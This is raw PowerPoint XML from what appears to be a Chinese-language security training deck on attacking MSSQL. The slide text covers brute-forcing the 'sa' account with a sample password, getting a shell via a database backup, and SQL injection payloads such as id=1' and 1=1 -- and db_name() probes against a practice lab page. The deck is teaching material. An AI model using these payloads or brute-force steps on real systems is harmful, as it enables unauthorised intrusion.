              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>备份完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>过后删除表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1467" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8966767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C6DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="906719" y="2367643"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>爆破</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sa:1qaz!QAZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>此处也可以使用其他工具进行爆破</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MSSQL_Stuff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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6AFA278-6571-4312-97E9-010CF5A24DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5690998" y="1521069"/>
            <a:ext cx="5594283" cy="4522630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381549721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400" dirty="0"/>
              <a:t>实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="4924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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB17AAB-5F14-A646-A6EC-EF37FC446B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722034" y="4203186"/>
            <a:ext cx="6747933" cy="2126061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745913" y="1052324"/>
            <a:ext cx="11545147" cy="30777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以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Less-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>为例</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p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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判断注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412790" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> 返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> 返回错误</a:t>
            </a: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79988" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>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获得当前连接的数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>/less-1.asp?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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()=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="右大括号 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BEA1E9-17A9-4644-BAC5-40297E33A2C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518487" y="1944260"/>
            <a:ext cx="431800" cy="924560"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">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60959" rIns="121919" bIns="60959" numCol="1" spcCol="38100" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" latinLnBrk="1" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF9E7A3-C0D8-B64D-9406-FF239DFEA73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7171712" y="2224955"/>
            <a:ext cx="3377353" cy="36932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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>判断出注入点为单引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> ' )</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="160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2240232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81001" y="1265767"/>
            <a:ext cx="11791527" cy="471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spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>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solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>的基本语句：</a:t>
            </a:r>
            <a:endPar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endParaRP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创建数据库：CREATE DATABASE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
